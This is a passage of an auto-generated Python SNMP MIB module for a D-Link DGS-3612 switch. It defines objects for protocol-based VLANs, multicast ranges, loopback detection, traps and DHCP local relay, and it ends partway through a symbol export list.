if mibBuilder.loadTexts: swL2dot1vProtocolTemplateFrameType.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolTemplateFrameType.setDescription("The data-link encapsulation format or the 'detagged_frame_type' in a Protocol Template.")
swL2dot1vProtocolTemplateProtocolValue = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2dot1vProtocolTemplateProtocolValue.setReference('IEEE 802.1v clause 8.6.2')
if mibBuilder.loadTexts: swL2dot1vProtocolTemplateProtocolValue.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolTemplateProtocolValue.setDescription("The identification of the protocol above the data-link layer in a Protocol Template. Depending on the frame type, the octet string will have one of the following values: For 'ethernet', 'rfc1042' and 'snap8021H', this is the 16-bit (2-octet) IEEE 802.3 Type Field. For 'llcOther', this is the 2-octet IEEE 802.2 Link Service Access Point (LSAP) pair: first octet for Destination Service Access Point (DSAP) and second octet for Source Service Access Point (SSAP).")
swL2dot1vProtocolGroupId = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2dot1vProtocolGroupId.setReference('IEEE 802.1v clause 8.6.3, 12.10.2.1')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupId.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupId.setDescription('Represents a group of protocols that are associated together when assigning a VID to a frame.')
swL2dot1vProtocolGroupRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2dot1vProtocolGroupRowStatus.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupRowStatus.setDescription('This object indicates the status of this entry.')
swL2dot1vProtocolPortTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2), )
if mibBuilder.loadTexts: swL2dot1vProtocolPortTable.setReference('IEEE 802.1v clause 8.4.4')
if mibBuilder.loadTexts: swL2dot1vProtocolPortTable.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPortTable.setDescription('A table that contains VID sets used for Port-and-Protocol-based VLAN Classification.')
swL2dot1vProtocolPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2dot1vProtocolPort"), (0, "DGS3612-L2MGMT-MIB", "swL2dot1vProtocolPortGroupId"))
if mibBuilder.loadTexts: swL2dot1vProtocolPortEntry.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPortEntry.setDescription('A VID set for a port.')
swL2dot1vProtocolPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2dot1vProtocolPort.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPort.setDescription('The port number of the port.')
swL2dot1vProtocolPortGroupId = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupId.setReference('IEEE 802.1v clause 8.6.3, 12.10.1.2')
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupId.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupId.setDescription('Designates a group of protocols in the Protocol Group Database.')
swL2dot1vProtocolPortGroupVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4094))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupVid.setReference('IEEE 802.1v clause 8.4.4, 12.10.1.2')
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupVid.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupVid.setDescription('The VID associated with a group of protocols for each port.')
swL2dot1vProtocolPortRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2, 1, 5), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2dot1vProtocolPortRowStatus.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPortRowStatus.setDescription('This object indicates the status of this entry.')
swL2MulticastRangeTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1), )
if mibBuilder.loadTexts: swL2MulticastRangeTable.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeTable.setDescription('A table that contains multicast address range information.')
swL2MulticastRangeEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2MulticastRangeName"))
if mibBuilder.loadTexts: swL2MulticastRangeEntry.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeEntry.setDescription('Information about multicast address range.')
swL2MulticastRangeName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1, 1, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2MulticastRangeName.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeName.setDescription('The name of multicast address range.')
swL2MulticastRangeHead = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1, 1, 2), IpAddress()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MulticastRangeHead.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeHead.setDescription('The head of multicast address range.')
swL2MulticastRangeTail = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1, 1, 3), IpAddress()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MulticastRangeTail.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeTail.setDescription('The tail of multicast address range.')
swL2MulticastRangeState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MulticastRangeState.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeState.setDescription('This object indicates the status of this entry.')
swL2LoopDetectCtrl = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1))
swL2LoopDetectAdminState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectAdminState.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectAdminState.setDescription('This object indicates the loopback detection status for the system.')
swL2LoopDetectInterval = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 32767))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectInterval.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectInterval.setDescription('This object indicates the interval value, the range is from 1 to 32767 seconds.')
swL2LoopDetectRecoverTime = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1000000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectRecoverTime.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectRecoverTime.setDescription('This object indicates the recover time, the range is from 60 to 1000000. The value of 0 disables the recover function.')
swL2LoopDetectMode = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("vlan-based", 1), ("port-based", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectMode.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectMode.setDescription('This object indicates the loopback detection mode for the system.')
swL2LoopDetectTrapMode = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("none", 1), ("loop_detected", 2), ("loop_cleared", 3), ("both", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectTrapMode.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectTrapMode.setDescription('This object indicates the loopback detection trap mode for the system.')
swL2LoopDetectPortMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2))
swL2LoopDetectPortTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1), )
if mibBuilder.loadTexts: swL2LoopDetectPortTable.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortTable.setDescription('This table specifies the loopback detection function on a per-port basis.')
swL2LoopDetectPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2LoopDetectPortIndex"))
if mibBuilder.loadTexts: swL2LoopDetectPortEntry.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortEntry.setDescription('An entry in the table that specifies the loopback detection function for a port.')
swL2LoopDetectPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LoopDetectPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortIndex.setDescription("This object indicates the module's port number. The range is from 1 to the maximum port number specified in the module.")
swL2LoopDetectPortState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectPortState.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortState.setDescription('This object indicates the loopback detection function state on the port.')
swL2LoopDetectPortLoopVLAN = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LoopDetectPortLoopVLAN.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortLoopVLAN.setDescription('This object indicates the VLAN list that has detected a loopback.')
swL2LoopDetectPortLoopStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("normal", 1), ("loop", 2), ("error", 3), ("none", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LoopDetectPortLoopStatus.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortLoopStatus.setDescription('This object indicates the port status.')
swL2Notify = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1))
swL2NotifyPrefix = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2))
swL2NotifFirmware = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0))
swL2macNotification = NotificationType((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0, 1)).setObjects(("DGS3612-L2MGMT-MIB", "swL2macNotifyInfo"))
if mibBuilder.loadTexts: swL2macNotification.setStatus('current')
if mibBuilder.loadTexts: swL2macNotification.setDescription('This trap indicates a variation of MAC addresses in the address table.')
swL2PortLoopOccurred = NotificationType((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0, 3)).setObjects(("DGS3612-L2MGMT-MIB", "swL2LoopDetectPortIndex"))
if mibBuilder.loadTexts: swL2PortLoopOccurred.setStatus('current')
if mibBuilder.loadTexts: swL2PortLoopOccurred.setDescription('This trap is sent when a port loop has occurred.')
swL2PortLoopRestart = NotificationType((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0, 4)).setObjects(("DGS3612-L2MGMT-MIB", "swL2LoopDetectPortIndex"))
if mibBuilder.loadTexts: swL2PortLoopRestart.setStatus('current')
if mibBuilder.loadTexts: swL2PortLoopRestart.setDescription('This trap is sent when a port loop restarts after the interval time.')
swL2VlanLoopOccurred = NotificationType((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0, 5)).setObjects(("DGS3612-L2MGMT-MIB", "swL2LoopDetectPortIndex"), ("DGS3612-L2MGMT-MIB", "swL2VlanLoopDetectVID"))
if mibBuilder.loadTexts: swL2VlanLoopOccurred.setStatus('current')
if mibBuilder.loadTexts: swL2VlanLoopOccurred.setDescription('This trap is sent when a loop occurs on a port with the given VID.')
swL2VlanLoopRestart = NotificationType((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0, 6)).setObjects(("DGS3612-L2MGMT-MIB", "swL2LoopDetectPortIndex"), ("DGS3612-L2MGMT-MIB", "swL2VlanLoopDetectVID"))
if mibBuilder.loadTexts: swL2VlanLoopRestart.setStatus('current')
if mibBuilder.loadTexts: swL2VlanLoopRestart.setDescription('This trap is sent when a loop on a port with the given VID restarts after the interval time.')
swl2NotificationBidings = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 1))
swL2macNotifyInfo = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 1024))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2macNotifyInfo.setStatus('current')
if mibBuilder.loadTexts: swL2macNotifyInfo.setDescription('This object contains the MAC address notification information conveyed by the swL2macNotification trap.')
swL2VlanLoopDetectVID = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 1, 3), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: swL2VlanLoopDetectVID.setStatus('current')
if mibBuilder.loadTexts: swL2VlanLoopDetectVID.setDescription('This object indicates the VID that has detected a loopback.')
swL2DhcpLocalRelayState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DhcpLocalRelayState.setStatus('current')
if mibBuilder.loadTexts: swL2DhcpLocalRelayState.setDescription('This object indicates the status of the DHCP local relay function of the switch.')
swL2DhcpLocalRelayVLANTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24, 2), )
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANTable.setStatus('current')
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANTable.setDescription('This table is used to manage the DHCP local relay status for each VLAN.')
swL2DhcpLocalRelayVLANEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24, 2, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2DhcpLocalRelayVLANID"))
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANEntry.setStatus('current')
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANEntry.setDescription('This object lists the current VLANs in the switch and their corresponding DHCP local relay status.')
swL2DhcpLocalRelayVLANID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4094))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANID.setStatus('current')
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANID.setDescription('This object shows the VIDs of the current VLANs in the switch.')
swL2DhcpLocalRelayVLANState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANState.setStatus('current')
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANState.setDescription('This object indicates the status of the DHCP local relay function of the VLAN.')
mibBuilder.exportSymbols("DGS3612-L2MGMT-MIB", swL2QOS8021pDefaultPriorityTable=swL2QOS8021pDefaultPriorityTable, swL2QOS8021pUserPriorityEntry=swL2QOS8021pUserPriorityEntry, swL2PortBufferFullDrops=swL2PortBufferFullDrops, swL2PortAutoNegInfoTable=swL2PortAutoNegInfoTable, swL2DevCtrlTelnet=swL2DevCtrlTelnet, swL2IGMPMaxSupportedVlans=swL2IGMPMaxSupportedVlans, swIGMPSnoopingGroupVid=swIGMPSnoopingGroupVid, swL2IGMPForwardingVid=swL2IGMPForwardingVid, swL2IGMPCtrlEntry=swL2IGMPCtrlEntry, swL2IGMPFastLeaveState=swL2IGMPFastLeaveState, swL2TrunkVLANPort=swL2TrunkVLANPort, swL2IGMPMacAddr=swL2IGMPMacAddr, swL2IGMPMulticastVlanGroupTable=swL2IGMPMulticastVlanGroupTable, swL2PortLoopRestart=swL2PortLoopRestart, swL2QOSBandwidthRadiusRxRate=swL2QOSBandwidthRadiusRxRate, swL2DevCtrlWebTcpPort=swL2DevCtrlWebTcpPort, swL2TrunkCurrentNumEntries=swL2TrunkCurrentNumEntries, swIGMPSnoopingGroupSourceAddr=swIGMPSnoopingGroupSourceAddr, swL2DevAlarm=swL2DevAlarm, swL2IGMPRouteTimeout=swL2IGMPRouteTimeout, swL2PVIDAutoAssignmentState=swL2PVIDAutoAssignmentState, swL2PortCtrlNwayState=swL2PortCtrlNwayState, swL2MultiFilter=swL2MultiFilter, swL2NotifFirmware=swL2NotifFirmware, swL2IGMPPortMap=swL2IGMPPortMap, swL2VlanIndex=swL2VlanIndex, swL2IGMPSnoopingStaticGroupMemberPortList=swL2IGMPSnoopingStaticGroupMemberPortList, swL2IGMPRouterPortsEntry=swL2IGMPRouterPortsEntry, swL2MulticastRangeHead=swL2MulticastRangeHead, swL2DevCtrlTelnetTcpPort=swL2DevCtrlTelnetTcpPort, swL2PortCtrlMACNotifyState=swL2PortCtrlMACNotifyState, swL2IGMPHostTimeout=swL2IGMPHostTimeout, swL2QOSSchedulingTable=swL2QOSSchedulingTable, swL2IGMPMulticastVlanSourcePort=swL2IGMPMulticastVlanSourcePort, swL2DevCtrlLLDPForwardMessageState=swL2DevCtrlLLDPForwardMessageState, swL2PortCtrlJumboFrameMaxSize=swL2PortCtrlJumboFrameMaxSize, swDevModuleInfoModuleName=swDevModuleInfoModuleName, swL2IGMPMulticastVlanGroupRangeName=swL2IGMPMulticastVlanGroupRangeName, swL2IpLimitedMulticastRangeName=swL2IpLimitedMulticastRangeName, swL2IpLimitedMulticastDelState=swL2IpLimitedMulticastDelState, swL2DevCtrlIGMPSnoopingMcstRTOnly=swL2DevCtrlIGMPSnoopingMcstRTOnly, swL2MirrorGroupID=swL2MirrorGroupID, swL2PortInfoType=swL2PortInfoType, swCpuRxRateControlTable=swCpuRxRateControlTable, swDevInfoTotalNumOfPort=swDevInfoTotalNumOfPort, swL2DhcpLocalRelayVLANID=swL2DhcpLocalRelayVLANID, swL2IGMPLastMemberQueryInterval=swL2IGMPLastMemberQueryInterval, swL2TrunkAlgorithm=swL2TrunkAlgorithm, swL2IGMPInfoTable=swL2IGMPInfoTable, swL2LimitedMulticastAddressPort=swL2LimitedMulticastAddressPort, swL2IGMPCtrlState=swL2IGMPCtrlState, swL2PortSecurityMode=swL2PortSecurityMode, swL2IGMPMulticastVlanGroupTail=swL2IGMPMulticastVlanGroupTail, swL2dot1vProtocolGroupEntry=swL2dot1vProtocolGroupEntry, swL2QOS8021pDefaultPriorityEntry=swL2QOS8021pDefaultPriorityEntry, swL2PortDropCounterEntry=swL2PortDropCounterEntry, swL2IGMPForwardingGroupAddr=swL2IGMPForwardingGroupAddr, swL2QOSSchedulingMechanism=swL2QOSSchedulingMechanism, swL2PortAutoNegInfoCapAdvertisedBits=swL2PortAutoNegInfoCapAdvertisedBits, swL2IGMPMulticastVlanUntagSourcePort=swL2IGMPMulticastVlanUntagSourcePort, swL2DevCtrlWebState=swL2DevCtrlWebState, swL2VlanLoopRestart=swL2VlanLoopRestart, swL2VlanName=swL2VlanName, MacAddress=MacAddress, swDevModuleInfoModuleID=swDevModuleInfoModuleID, swL2QOS8021pRadiusPriority=swL2QOS8021pRadiusPriority, swL2PortSecurityControlEntry=swL2PortSecurityControlEntry, swL2PortCtrlLockState=swL2PortCtrlLockState, 
swL2PortCtrlAutoNegCapAdvertisedBits=swL2PortCtrlAutoNegCapAdvertisedBits, swCosBandwidthClassID=swCosBandwidthClassID, swL2IGMPMulticastVlanReplaceSourceIP=swL2IGMPMulticastVlanReplaceSourceIP, swL2PortAutoNegInfoEntry=swL2PortAutoNegInfoEntry, swL2PortCtrlUnitIndex=swL2PortCtrlUnitIndex, swDevInfoNumOfPortInUse=swDevInfoNumOfPortInUse, swL2MulticastRangeTail=swL2MulticastRangeTail, swL2IGMPCurrentState=swL2IGMPCurrentState, swL2TrunkMgmt=swL2TrunkMgmt, swL2LoopDetectPortLoopVLAN=swL2LoopDetectPortLoopVLAN, swL2IGMPMulticastVlanRowStatus=swL2IGMPMulticastVlanRowStatus, swL2PortACLDrops=swL2PortACLDrops, swL2IGMPMulticastVlanGroupVid=swL2IGMPMulticastVlanGroupVid, swL2IGMPInfoQueryCount=swL2IGMPInfoQueryCount, swL2TrunkMasterPort=swL2TrunkMasterPort, swL2IGMPMulticastVlanGroupHead=swL2IGMPMulticastVlanGroupHead, swL2QOSSchedulingClassID=swL2QOSSchedulingClassID, swL2MirrorGroupEntry=swL2MirrorGroupEntry, swL2IGMPMaxIpGroupNumPerVlan=swL2IGMPMaxIpGroupNumPerVlan, swL2MgmtMIBTraps=swL2MgmtMIBTraps, swL2DevCtrlVlanIdOfFDBTbl=swL2DevCtrlVlanIdOfFDBTbl, swL2MirrorGroupPortSourceIngress=swL2MirrorGroupPortSourceIngress, swL2DhcpLocalRelayVLANEntry=swL2DhcpLocalRelayVLANEntry, swL2TrunkMaxSupportedEntries=swL2TrunkMaxSupportedEntries, swL2TrunkVLANTable=swL2TrunkVLANTable, swL2DevCtrlCleanAllStatisticCounter=swL2DevCtrlCleanAllStatisticCounter, swL2IGMPMulticastVlanRangeName=swL2IGMPMulticastVlanRangeName, swL2MgmtMIB=swL2MgmtMIB, swL2MulticastRangeState=swL2MulticastRangeState, swL2VlanTable=swL2VlanTable, swL2QOSBandwidthRadiusTxRate=swL2QOSBandwidthRadiusTxRate, swL2DevAlarmTopologyChange=swL2DevAlarmTopologyChange, swL2MultiFilterTable=swL2MultiFilterTable, swL2TrunkVLANState=swL2TrunkVLANState, swL2IGMPMulticastVlanState=swL2IGMPMulticastVlanState, swL2QOS8021pDefaultPriorityIndex=swL2QOS8021pDefaultPriorityIndex, swL2PortCtrlFlowCtrlState=swL2PortCtrlFlowCtrlState, swL2IGMPForwardingEntry=swL2IGMPForwardingEntry, swL2LoopDetectAdminState=swL2LoopDetectAdminState, swL2QOSSchedulingEntry=swL2QOSSchedulingEntry, swDevInfoFirmwareVersion=swDevInfoFirmwareVersion, swL2IGMPInfoTxQueryCount=swL2IGMPInfoTxQueryCount, swL2QOSBandwidthControlTable=swL2QOSBandwidthControlTable, swL2PortInfoUnitID=swL2PortInfoUnitID, swL2dot1vProtocolMgmt=swL2dot1vProtocolMgmt, swL2IGMPSnoopingStaticGroupRowStatus=swL2IGMPSnoopingStaticGroupRowStatus, swL2IpLimitedMulticastMgmt=swL2IpLimitedMulticastMgmt, swL2QOSBandwidthTxRate=swL2QOSBandwidthTxRate, swL2DevCtrlVLANTrunkState=swL2DevCtrlVLANTrunkState, swL2PortInfoNwayStatus=swL2PortInfoNwayStatus, swL2PortSecurityDelActivity=swL2PortSecurityDelActivity, swL2PortLoopOccurred=swL2PortLoopOccurred, swL2NotifyPrefix=swL2NotifyPrefix, swL2IpLimitedMulticastRangeNameState=swL2IpLimitedMulticastRangeNameState, swL2TrunkIndex=swL2TrunkIndex, swL2PortInfoMediumType=swL2PortInfoMediumType, swL2QOS8021pUserPriorityClass=swL2QOS8021pUserPriorityClass, swL2MulticastRangeMgmt=swL2MulticastRangeMgmt, swIGMPSnoopingGroupGroupAddr=swIGMPSnoopingGroupGroupAddr, swL2DhcpLocalRelayMgmt=swL2DhcpLocalRelayMgmt, swDevInfoBootPromVersion=swDevInfoBootPromVersion, swL2QOSSchedulingMechanismCtrl=swL2QOSSchedulingMechanismCtrl, swL2DevCtrlClipagingState=swL2DevCtrlClipagingState, swL2IGMPMulticastVlanTagMemberPort=swL2IGMPMulticastVlanTagMemberPort, swL2IGMPMulticastVlanTable=swL2IGMPMulticastVlanTable, swL2TrunkLACPPortTable=swL2TrunkLACPPortTable, swL2IpLimitedMulticastState=swL2IpLimitedMulticastState, swL2IGMPRouterDynamicPortList=swL2IGMPRouterDynamicPortList, 
swL2PortSecurityDelPort=swL2PortSecurityDelPort, swIGMPSnoopingGroupExcludePortMap=swIGMPSnoopingGroupExcludePortMap, swL2IGMPCtrlVid=swL2IGMPCtrlVid, swL2DevAlarmNewRoot=swL2DevAlarmNewRoot, swL2macNotifyInfo=swL2macNotifyInfo, swL2PortInfoEntry=swL2PortInfoEntry, swL2PortAutoNegInfoCapabilityBits=swL2PortAutoNegInfoCapabilityBits, swL2IGMPForwardingTable=swL2IGMPForwardingTable, swL2dot1vProtocolGroupRowStatus=swL2dot1vProtocolGroupRowStatus, swCosBandwidthControlTable=swCosBandwidthControlTable, swDevModuleInfoUnitID=swDevModuleInfoUnitID, swL2LimitedMulticastAddressRangeName=swL2LimitedMulticastAddressRangeName, swL2IGMPForwardingSrcIp=swL2IGMPForwardingSrcIp, swL2MulticastRangeName=swL2MulticastRangeName, swL2PortSecurityMgmt=swL2PortSecurityMgmt, swL2DevCtrlTelnetState=swL2DevCtrlTelnetState, swL2VlanType=swL2VlanType, swL2dot1vProtocolPortGroupVid=swL2dot1vProtocolPortGroupVid, swL2PortInfoPortIndex=swL2PortInfoPortIndex, swL2TrunkType=swL2TrunkType, swL2IGMPRouterForbiddenPortList=swL2IGMPRouterForbiddenPortList, swL2DevInfo=swL2DevInfo, swL2VlanEntry=swL2VlanEntry, swL2PortCtrlAdminState=swL2PortCtrlAdminState, swL2MultiFilterMode=swL2MultiFilterMode, swL2IGMPReportSuppression=swL2IGMPReportSuppression, PYSNMP_MODULE_ID=swL2MgmtMIB, swL2dot1vProtocolPortTable=swL2dot1vProtocolPortTable, swL2PortSecurityPortIndex=swL2PortSecurityPortIndex, swL2LoopDetectCtrl=swL2LoopDetectCtrl, swL2MirrorGroupPortSourceEngress=swL2MirrorGroupPortSourceEngress, swL2IpLimitedMulticastPortIndex=swL2IpLimitedMulticastPortIndex, swL2DevCtrlIpAutoconfig=swL2DevCtrlIpAutoconfig, swL2DhcpLocalRelayVLANTable=swL2DhcpLocalRelayVLANTable, swL2dot1vProtocolPortEntry=swL2dot1vProtocolPortEntry, swIGMPSnoopingGroupEntry=swIGMPSnoopingGroupEntry, swL2IGMPSnoopingStaticGroupTable=swL2IGMPSnoopingStaticGroupTable, swL2PortCtrlMediumType=swL2PortCtrlMediumType, swL2LoopDetectPortIndex=swL2LoopDetectPortIndex, swL2IGMPVid=swL2IGMPVid, swL2IGMPRouterPortsVid=swL2IGMPRouterPortsVid, swL2PortVLANIngressDrops=swL2PortVLANIngressDrops, swL2IGMPIpGroupReportCount=swL2IGMPIpGroupReportCount, swL2PortAutoNegInfoPortIndex=swL2PortAutoNegInfoPortIndex, swL2MACNotifyInterval=swL2MACNotifyInterval, swL2MirrorLogicTargetPort=swL2MirrorLogicTargetPort, swL2PortAutoNegInfoAdminStatus=swL2PortAutoNegInfoAdminStatus, swL2DevCtrlWeb=swL2DevCtrlWeb, swL2PortMgmt=swL2PortMgmt, swL2dot1vProtocolPort=swL2dot1vProtocolPort, swCpuRxRateControlEntry=swCpuRxRateControlEntry, VlanId=VlanId, swL2TrunkMember=swL2TrunkMember, swL2LoopDetectPortEntry=swL2LoopDetectPortEntry, swL2IGMPSnoopingStaticGroupEntry=swL2IGMPSnoopingStaticGroupEntry, swL2VlanStaticPorts=swL2VlanStaticPorts, swL2PortSecurityDelMacAddress=swL2PortSecurityDelMacAddress, 